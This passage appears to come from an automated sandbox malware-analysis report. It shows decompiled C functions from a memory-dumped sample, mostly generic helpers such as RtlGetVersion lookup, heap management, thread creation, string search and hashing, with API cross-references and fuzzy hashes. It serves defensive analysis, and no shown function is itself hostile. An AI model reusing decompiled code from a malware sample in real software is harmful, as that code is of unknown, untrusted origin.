API ID: memmovewcsncmpwcsncpy
String ID: $ A$$ A
API String ID: 1452150355-1089091023
Opcode ID: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
Instruction ID: ed4ff4c18a2212810426b4098d69787d901a9ef51c17c0146ffb5f4eacdccb4b
Opcode Fuzzy Hash: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
Instruction Fuzzy Hash: 9F310636904B058BC720BB45888057B73A8EF84344F14893FEC85773C2EB789D61CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405553, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00405553(void* _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t5;
				signed int _t6;
				void* _t10;

				_t10 = _a4;
				memset(_t10, 0, 0x11c);
				 *_t10 = 0x11c;
				_t3 = GetModuleHandleW(L"ntdll.dll");
				if(_t3 == 0) {
					L3:
					return 0;
				}
				_t5 = GetProcAddress(_t3, "RtlGetVersion");
				if(_t5 == 0) {
					goto L3;
				}
				_t6 =  *_t5(_t10);
				asm("sbb eax, eax");
				return  ~_t6 + 1;
			}

0x00405554
0x00405562
0x0040556a
0x00405571
0x00405579
0x00405595
0x00000000
0x00405595
0x00405581
0x00405589
0x00000000
0x00000000
0x0040558c
0x00405590
0x00000000

APIs

memset.MSVCRT ref: 00405562
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

Strings

ntdll.dll, xrefs: 0040556C
RtlGetVersion, xrefs: 0040557B

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
Instruction ID: d7b210edb93dcdeb2ccead98f224fd87bedff0db37ff7f51e22340fec2856e60
Opcode Fuzzy Hash: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
Instruction Fuzzy Hash: E0E0DF317606127AD6202B32AC09FCB2F9DDFCAB00B15043AB109F21C4E67CC5018ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00409FE3, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00409FE3(void** _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _t35;
				wchar_t* _t41;
				wchar_t* _t50;
				void* _t57;
				void** _t58;
				signed int _t59;

				_t50 = _a8;
				_t58 = _a4;
				if(_a12 != 1) {
					L4:
					if(_t50 == 0) {
						_t50 = 0x412024;
					}
					_push(_t50);
					if((_t58[0xb] & 0x00000001) == 0) {
						_t35 = E0040A24F();
					} else {
						_t35 = E0040A26A();
					}
					_t59 = _t35 % _t58[9];
					_t57 = E0040D51F(_t58[0xe]);
					if(_t57 == 0) {
						L14:
						return _t57;
					} else {
						_t41 = HeapAlloc( *0x417008, 0, 2 + wcslen(_t50) * 2);
						 *(_t57 + 4) = _t41;
						wcscpy(_t41, _t50);
						 *_t57 =  *(_t58[1] + _t59 * 4);
						 *(_t58[1] + _t59 * 4) = _t57;
						_t58[2] = _t58[2] & 0x00000000;
						_t58[0xa] = _t58[0xa] + 1;
						 *_t58 = _t57;
						_t57 = _t57 + 8;
						_t58[5] = _t59;
						L11:
						if(_t57 != 0) {
							memset(_t57, 0, _t58[7]);
							if((_t58[0xb] & 0x00000002) != 0) {
								E00411B6F(_t57, _t58[4]);
							}
						}
						goto L14;
					}
				}
				_t57 = E00409F58(_t58, _t50);
				if(_t57 == 0) {
					goto L4;
				}
				if(_t58[4] != 0) {
					E00411A6A(_t48, _t57, _t58[4]);
				}
				goto L11;
			}

APIs

wcslen.MSVCRT ref: 0040A04B
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?,00403C62), ref: 0040A061
wcscpy.MSVCRT ref: 0040A06C
memset.MSVCRT ref: 0040A09A

Strings

$ A, xrefs: 0040A01C

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $ A
API String ID: 1807340688-1415209610
Opcode ID: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
Instruction ID: 6837a03683538e1df5e2bdda5e350eaa22186be17e149c7482ea07580a24f61f
Opcode Fuzzy Hash: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
Instruction Fuzzy Hash: 2F21F732400B04AFC331AF259881B67B7F5EF88318F14453FFA4562692D739A8148B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00409D80, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _v0;
				void* _t25;
				void* _t31;
				void* _t34;
				signed int _t36;
				intOrPtr _t38;
				long _t39;
				intOrPtr _t41;
				void* _t42;

				_t41 = _a16;
				E00409E6F(_v0);
				_t34 = HeapAlloc( *0x417008, 0, 0x3c);
				if(_t34 != 0) {
					_t36 =  *(_t42 + 0x24);
					if(_t36 <= 0) {
						_t36 = 1;
					}
					_t25 = HeapAlloc( *0x417008, 8, _t36 << 2);
					 *(_t34 + 4) = _t25;
					if(_t25 == 0) {
						HeapFree( *0x417008, 0, _t34);
						_t34 = 0;
					} else {
						 *((intOrPtr*)(_t34 + 0x20)) = _a8;
						 *(_t34 + 0x24) = _t36;
						_t38 = _a4;
						 *_t34 = 0;
						 *((intOrPtr*)(_t34 + 0x1c)) = _t38;
						 *((intOrPtr*)(_t34 + 0x10)) =  *((intOrPtr*)(_t42 + 0x1c));
						 *((intOrPtr*)(_t34 + 0x28)) = 0;
						 *(_t34 + 0x2c) = 0;
						 *((intOrPtr*)(_t34 + 0x30)) = _t41;
						 *((intOrPtr*)(_t34 + 0x34)) = 0;
						if(E00411744( *((intOrPtr*)(_t42 + 0x1c))) != 0) {
							 *(_t34 + 0x2c) =  *(_t34 + 0x2c) | 0x00000002;
						}
						_t39 = _t38 + 8;
						 *((intOrPtr*)(_t34 + 0x38)) = E0040D7B9(_t39, 0x10, 0x10000, 4);
						_t31 = HeapAlloc( *0x417008, 8, _t39);
						 *(_t34 + 0xc) = _t31;
						 *((intOrPtr*)(_t31 + 4)) = 0x412024;
						_v0 = _t34;
					}
				}
				return _t34;
			}

APIs

Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E3C

Strings

$ A, xrefs: 00409E27

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc
String ID: $ A
API String ID: 3901518246-1415209610
Opcode ID: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
Instruction ID: 0e5c90150bc367b96ffc2f2020c4fe6cd7e8dd6a87ef93d6b65d9b762928b75a
Opcode Fuzzy Hash: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
Instruction Fuzzy Hash: 66216D71644711ABD3118F2ADD01B46BBE8FF48750F40812AB608E7691D770EC65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405492, Relevance: 7.6, APIs: 5, Instructions: 60
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405492(void* __ebx, _Unknown_base(*)()* _a4, void* _a8) {
				long _v4;
				long _t9;
				intOrPtr* _t11;
				void** _t16;
				intOrPtr* _t23;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = CreateThread(0, 0x1000, _a4, _a8, 0,  &_v4);
				if(_t26 != 0) {
					EnterCriticalSection(0x4176a0);
					_t23 =  *0x4170bc; // 0x0
					if(_t23 != 0) {
						do {
							_t4 = _t23 + 8; // 0x8
							_t16 = _t4;
							if(WaitForSingleObject( *_t16, _t25) != 0) {
								_t23 =  *_t23;
							} else {
								CloseHandle( *_t16);
								_t23 =  *_t23;
								E0040DAD2(0x4170bc, _t16);
							}
						} while (_t23 != 0);
					}
					_t9 =  *0x416110; // 0x1
					_t25 = _t9;
					 *0x416110 = _t9 + 1;
					_t11 = E0040DB12(0x4170bc, 0x10);
					 *_t11 = _t26;
					 *(_t11 + 4) = _t25;
					LeaveCriticalSection(0x4176a0);
				}
				return _t25;
			}

APIs

CreateThread.KERNEL32 ref: 004054AB
EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0

Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B

LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
Instruction ID: c80a9bd37122c97109a10f206962e584b77ac8964ddc4e7c45fa9607085a50ae
Opcode Fuzzy Hash: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
Instruction Fuzzy Hash: 1111A336204710BFC2115F59EC05E97BB69EB45762722802AF80197294EB75E9508F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8E6, Relevance: 7.6, APIs: 5, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8E6(void* __ebp, void* _a4) {
				int _t19;
				void _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;

				_t27 = _a4;
				_t26 =  *(_t27 + 8);
				if(_t26 == 0) {
					E0040D67D(_t27);
					if( *((intOrPtr*)(_t27 + 0x1c)) != 0) {
						_t14 = _t27 + 0x20; // 0x20
						DeleteCriticalSection(_t14);
					}
					return HeapFree( *0x417008, 0, _t27);
				}
				EnterCriticalSection(0x41761c);
				 *((intOrPtr*)( *(_t27 + 8) + 0x14)) =  *((intOrPtr*)( *(_t27 + 8) + 0x14)) - 1;
				_t19 =  *(_t27 + 8);
				if( *((intOrPtr*)(_t19 + 0x14)) <= 0) {
					 *(_t27 + 8) =  *(_t27 + 8) & 0x00000000;
					E0040D8E6(0x41761c, _t27);
					_t24 =  *_t26;
					if(_t24 != 0) {
						 *(_t24 + 4) =  *(_t26 + 4);
					}
					_t25 =  *(_t26 + 4);
					if(_t25 != 0) {
						 *_t25 =  *_t26;
					}
					_t35 =  *0x417618 - _t26; // 0x810fa8
					if(_t35 == 0) {
						 *0x417618 =  *_t26;
					}
					_t19 = HeapFree( *0x417008, 0, _t26);
				}
				LeaveCriticalSection(0x41761c);
				return _t19;
			}

APIs

EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F

Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D968
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D977

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
Instruction ID: 7b35f574515ae906377effd3f95b136c975bcdd302f3c0dc89a566dd6d791b35
Opcode Fuzzy Hash: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
Instruction Fuzzy Hash: BB1158B5502601EFC320AF59EC08F97BBB5FF44311F11843AA44AA36A1C734E849CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00409638, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409638(void* __eflags, intOrPtr _a4) {
				int _t9;
				void* _t18;
				signed int _t19;

				_t18 = E0040E200(0x104, _a4);
				_t19 = GetModuleFileNameW( *0x41700c, _t18, 0x104);
				_t9 = wcscmp(_t18, L"\\\\?\\");
				_pop(_t17);
				if(_t9 == 0) {
					_t17 = _t19 * 2 - 8;
					_t4 = _t18 + 8; // 0x8
					memmove(_t18, _t4, _t19 * 2 - 8);
					_t19 = _t19 - 4;
				}
				E0040E350(_t17, 0x104 - _t19);
				 *((short*)(_t18 + _t19 * 2)) = 0;
				return 0;
			}

0x0040964b
0x00409660
0x00409662
0x00409668
0x0040966b
0x0040966d
0x00409675
0x0040967a
0x00409682
0x00409682
0x00409688
0x0040968f
0x00409696

APIs

Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040E267

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
wcscmp.MSVCRT ref: 00409662
memmove.MSVCRT ref: 0040967A

Strings

\\?\, xrefs: 0040965A, 00409674

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 2309408642-4282027825
Opcode ID: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
Instruction ID: d9f8f264266041fd0450fbf5fddac35174bfa4872681c7093a6bedb058d4d6d6
Opcode Fuzzy Hash: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
Instruction Fuzzy Hash: 36F082B31007017BD2106777EC89CAB7F6CEB953B47500A3FF915D25D1EA39982486B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1D6, Relevance: 6.3, APIs: 5, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B1D6(intOrPtr _a4, void* _a8) {
				void _v8;
				intOrPtr _t42;
				void* _t43;
				void* _t46;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t52;
				void* _t54;

				_t52 = _a8;
				_t49 = 0;
				do {
					_t43 = 3;
					asm("sbb eax, eax");
					 *((char*)(_t54 + _t49 + 0x10)) =  *(_t52 + 0x14 +  ~(_t49 & 0x00000003) * 4) >> _t43 - (_t49 & 0x00000003) << 3;
					_t49 = _t49 + 1;
				} while (_t49 < 8);
				_push(1);
				_push(0x4126e8);
				_push(_t52);
				E0040C5D6();
				_t51 = _t52 + 0x14;
				while(1) {
					_t54 = _t54 + 0xc;
					if(( *_t51 & 0x000001f8) == 0x1c0) {
						break;
					}
					_push(1);
					_push(0x4126ec);
					_push(_t52);
					E0040C5D6();
				}
				_push(8);
				_push( &_v8);
				_push(_t52);
				E0040C5D6();
				_t42 = _a4;
				_t50 = 0;
				do {
					_t46 = 3;
					 *((char*)(_t50 + _t42)) =  *(_t52 + (_t50 >> 2) * 4) >> _t46 - (_t50 & 0x00000003) << 3;
					_t50 = _t50 + 1;
				} while (_t50 < 0x14);
				memset(_t52 + 0x1c, 0, 0x40);
				memset(_t52, 0, 0x14);
				memset(_t51, 0, 8);
				memset( &_v8, 0, 8);
				return memset(_t52 + 0x60, 0, 0x40);
			}

APIs

memset.MSVCRT ref: 0040B277
memset.MSVCRT ref: 0040B280
memset.MSVCRT ref: 0040B289
memset.MSVCRT ref: 0040B296
memset.MSVCRT ref: 0040B2A2

Part of subcall function 0040C5D6: memcpy.MSVCRT ref: 0040C630
Part of subcall function 0040C5D6: memcpy.MSVCRT ref: 0040C67F

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
Instruction ID: d1c0989406727a65e9950a574f083ae989d166c781cac5fdd553c274dd2af307
Opcode Fuzzy Hash: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
Instruction Fuzzy Hash: D821F1317507082BE124AA29DC86F9F738CDB81708F40063EF201FA1C1CAB9F54546AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B40, Relevance: 6.2, APIs: 4, Instructions: 167
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B40() {
				void* _t52;
				signed int _t62;
				void _t63;
				void* _t65;
				signed int _t67;
				void* _t68;
				signed int _t76;
				void* _t78;
				long _t81;
				signed int _t82;
				wchar_t* _t84;
				signed int _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				wchar_t* _t93;
				void* _t95;
				int _t97;
				wchar_t* _t98;
				void* _t100;

				_t93 =  *(_t100 + 0x20);
				if(_t93 == 0) {
					_t82 = 0;
					L5:
					_t52 = E0040E180(_t86, _t93);
					_t95 =  *(_t100 + 0x24);
					 *(_t100 + 0x24) = _t52;
					 *(_t100 + 0x28) = E0040E180(_t86, _t95);
					_t98 = E0040E200(_t82,  *((intOrPtr*)(_t100 + 0x34)));
					_t55 =  *(_t100 + 0x20);
					if( *(_t100 + 0x20) != 0) {
						_t93 = E0040E2D0(_t86, _t55);
					}
					_t56 =  *(_t100 + 0x24);
					if( *(_t100 + 0x24) != 0) {
						_t95 = E0040E2D0(_t86, _t56);
					}
					 *(_t100 + 0x18) = _t98;
					if(_t93 == 0 ||  *_t93 == 0) {
						L38:
						E0040E350(_t86, _t82 - (_t98 -  *(_t100 + 0x18) >> 1));
						 *_t98 = 0;
						return 0;
					} else {
						if(_t95 == 0 ||  *_t95 == 0) {
							_t86 = _t98 - _t93;
							do {
								_t62 =  *_t93 & 0x0000ffff;
								_t93 =  &(_t93[0]);
								 *(_t86 + _t93 - 2) = _t62;
							} while (_t62 != 0);
							_t98 = _t98 + _t82 * 2;
							goto L38;
						} else {
							_t88 = _t95;
							 *(_t100 + 0x14) = _t93;
							_t11 = _t88 + 2; // 0x2
							_t90 = _t11;
							do {
								_t63 =  *_t88;
								_t88 = _t88 + 2;
							} while (_t63 != 0);
							_t86 = _t88 - _t90 >> 1;
							 *(_t100 + 0x20) = _t86;
							if( *(_t100 + 0x24) == 0) {
								 *(_t100 + 0x10) =  *(_t100 + 0x2c);
								L20:
								 *((intOrPtr*)(_t100 + 0x34)) = 0x40530d;
								if(( *(_t100 + 0x28) & 0x00000001) == 0) {
									 *((intOrPtr*)(_t100 + 0x34)) = L004052F5;
								}
								_t65 =  *(_t100 + 0x2c);
								if(_t65 > 1) {
									wcsncpy(_t98, _t93, _t65 - 1);
									_t76 =  *(_t100 + 0x38);
									_t100 = _t100 + 0xc;
									_t98 = _t98 + _t76 * 2 + 0xfffffffe;
									_t93 = _t93 + _t76 * 2 + 0xfffffffe;
								}
								if( *_t93 == 0) {
									L30:
									if( *(_t100 + 0x24) != 0) {
										HeapFree( *0x417008, 0,  *(_t100 + 0x10));
									}
									goto L38;
								} else {
									_t67 =  *(_t100 + 0x20);
									do {
										_t68 =  *((intOrPtr*)(_t100 + 0x40))(_t93, _t95, _t67);
										_t100 = _t100 + 0xc;
										if(_t68 != 0) {
											 *_t98 =  *_t93;
											_t98 =  &(_t98[0]);
											_t67 =  *(_t100 + 0x20);
											_t93 =  &(_t93[0]);
											goto L33;
										}
										_t67 =  *(_t100 + 0x20);
										_t86 =  *(_t100 + 0x30);
										_t93 = _t93 + _t67 * 2;
										if(_t86 == 0xffffffff) {
											goto L33;
										}
										_t86 = _t86 - 1;
										 *(_t100 + 0x30) = _t86;
										if(_t86 > 0) {
											goto L33;
										}
										_t97 = _t82 - (_t93 -  *(_t100 + 0x14) >> 1);
										wcsncpy(_t98, _t93, _t97);
										_t100 = _t100 + 0xc;
										_t98 = _t98 + _t97 * 2;
										goto L30;
										L33:
									} while ( *_t93 != 0);
									goto L30;
								}
							}
							_t78 = HeapAlloc( *0x417008, 0, 2 + _t86 * 2);
							 *(_t100 + 0x10) = _t78;
							_t92 = _t78 - _t95;
							do {
								_t86 =  *_t95 & 0x0000ffff;
								_t95 = _t95 + 2;
								 *(_t92 + _t95 - 2) = _t86;
							} while (_t86 != 0);
							_t95 = _t78;
							goto L20;
						}
					}
				}
				_t84 = _t93;
				_t86 =  &(_t84[0]);
				do {
					_t81 =  *_t84;
					_t84 =  &(_t84[0]);
				} while (_t81 != 0);
				_t82 = _t84 - _t86 >> 1;
				goto L5;
			}

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C0A
wcsncpy.MSVCRT ref: 00405C60

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
Instruction ID: cb064e81f22c81d64e764a7bfd7558cc4db0c0b6a5bd9f26a61017110445664c
Opcode Fuzzy Hash: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
Instruction Fuzzy Hash: 2151DE305087059BDB209F28D844A6BB7F4FF84348F544A2EFC45A72D0E778E915CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406610, Relevance: 6.1, APIs: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406610() {
				WCHAR* _t16;
				signed short _t19;
				WCHAR* _t20;
				signed short* _t25;
				signed short _t27;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed short* _t34;
				signed short* _t36;
				signed short* _t42;
				signed short* _t44;
				signed short* _t45;
				signed int _t47;
				WCHAR* _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x24);
				_t16 =  *_t44 & 0x0000ffff;
				_t45 =  &(_t44[1]);
				 *(_t49 + 0x2c) = _t45;
				if(_t16 == 0) {
					return  *(_t49 + 0x28);
				} else {
					_t31 = CharLowerW(_t16) & 0x0000ffff;
					_t33 =  &(_t45[1]);
					 *(_t49 + 0x1c) = _t31;
					do {
						_t19 =  *_t45;
						_t45 =  &(_t45[1]);
					} while (_t19 != 0);
					_t42 =  *(_t49 + 0x28);
					_t47 = _t45 - _t33 >> 1;
					 *(_t49 + 0x18) = _t47;
					while(1) {
						_t20 =  *_t42 & 0x0000ffff;
						_t42 =  &(_t42[1]);
						if(_t20 == 0) {
							break;
						}
						if(CharLowerW(_t20) != _t31) {
							continue;
						} else {
							_t36 =  *(_t49 + 0x2c);
							_t32 = _t47;
							_t34 = _t36;
							if(_t47 == 0) {
								L13:
								return _t42 - 2;
							} else {
								_t25 = _t42 - _t36;
								 *(_t49 + 0x14) = _t25;
								while(1) {
									_t48 =  *(_t25 + _t34) & 0x0000ffff;
									 *(_t49 + 0x14) =  &(_t34[1]);
									_t27 = CharLowerW( *_t34 & 0x0000ffff);
									if((CharLowerW(_t48) & 0x0000ffff) != (_t27 & 0x0000ffff)) {
										break;
									}
									if(_t48 == 0) {
										goto L13;
									} else {
										_t32 = _t32 - 1;
										if(_t32 == 0) {
											goto L13;
										} else {
											_t34 =  *(_t49 + 0x10);
											_t25 =  *(_t49 + 0x14);
											continue;
										}
									}
									goto L16;
								}
								_t47 =  *(_t49 + 0x18);
								_t31 =  *(_t49 + 0x1c);
								continue;
							}
						}
						goto L16;
					}
					return 0;
				}
				L16:
			}

APIs

CharLowerW.USER32 ref: 00406636
CharLowerW.USER32(00000000), ref: 00406670
CharLowerW.USER32(?), ref: 0040669F
CharLowerW.USER32(?), ref: 004066A5

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
